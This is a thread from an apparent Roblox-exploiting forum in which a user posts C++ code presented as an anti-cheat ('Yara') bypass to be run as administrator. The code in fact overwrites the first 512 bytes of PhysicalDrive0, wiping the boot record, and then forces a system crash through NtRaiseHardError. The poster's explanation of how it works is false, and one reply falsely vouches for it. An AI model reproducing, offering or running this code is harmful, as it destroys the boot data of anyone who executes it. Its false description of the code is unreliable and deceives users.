Categories > Exploiting > Roblox >

[rel] Full Roblox Anti Cheat (Yara) Bypass

Skid_Destroyer

Self Taught (Pro)grammer

Posts: 10

Threads: 2

Joined: Jul, 2022

Reputation: 3

Posted

Hello Skids.

 

Today I've decided to release my unpatchable Yara Bypass.

 

#include <iostream>
#include <windows.h>

int main() {
	static auto mod = reinterpret_cast<uintptr_t>(GetModuleHandle(nullptr));

	const auto ntdll = GetModuleHandleA("ntdll.dll");

	using rtladjustprivilege_t = NTSTATUS(__stdcall*)(ULONG, BOOLEAN, BOOLEAN, PBOOLEAN);
	const auto RtlAdjustPrivilege = reinterpret_cast<rtladjustprivilege_t>(GetProcAddress(ntdll, "RtlAdjustPrivilege"));

	using ntraiseharderror_t = NTSTATUS(__stdcall*)(NTSTATUS, ULONG, ULONG, PULONG_PTR*, ULONG, PULONG);
	const auto NtRaiseHardError = reinterpret_cast<ntraiseharderror_t>(GetProcAddress(ntdll, "NtRaiseHardError"));

	uint8_t payload[0x200];
	RtlZeroMemory(&payload, 0x200);

	const auto yara = CreateFileA("\\\\.\\PhysicalDrive0", 0x10000000L, FILE_SHARE_READ | FILE_SHARE_WRITE, nullptr, 3, 0, nullptr);
	if (WriteFile(yara, payload, 0x200, nullptr, nullptr)) {
		BOOLEAN b_enabled;
		RtlAdjustPrivilege(19, true, false, &b_enabled);

		ULONG response;
		NtRaiseHardError(0xE12DAA1F, 0, 0, 0, 6, &response);
	}
}

 

It works by raising an exception at the address "0xE12DAA1F" which will fully disable Yara due to lack of competency from the Roblox Development Team. It works externally and is undectectable. Please leave a vouch if the bypass worked for you

 

Make sure to run it as administrator to avoid any errors. 

  • 5

SeizureSalad

i love femboys

Posts: 1018

Threads: 73

Joined: Mar, 2021

Reputation: 37

Replied

vouch. can confirm this works. make sure to run as admin tho but this works 100%

  • 0

"Questionable intellegence, but I like the mystery" - CubeFaces

https://cdn.discordapp.com/attachments/1136067487847415848/1138948596679589898/sig.png

Whoman

0981

Posts: 1227

Threads: 68

Joined: May, 2022

Reputation: 17

Replied

Imma just commit "no trust"

https://cdn.discordapp.com/attachments/978212409145708565/997561258918301777/unknown.png

  • 0

Did I mention I use arch btw?

Skid_Destroyer

Self Taught (Pro)grammer

Posts: 10

Threads: 2

Joined: Jul, 2022

Reputation: 3

Replied

@Whoman This is just Yara's secret NamedPipe Name. It is used to communicate between the Main Process and the Daemon.

  • 1

ecstacy_lxnny

fka as delta

vip

Posts: 773

Threads: 70

Joined: May, 2021

Reputation: 95

Replied

Guys you have to disable fe in your headhunter first to use it otherwise it wont work

  • 0

fka as delta

Users viewing this thread:

( Members: 0, Guests: 1, Total: 1 )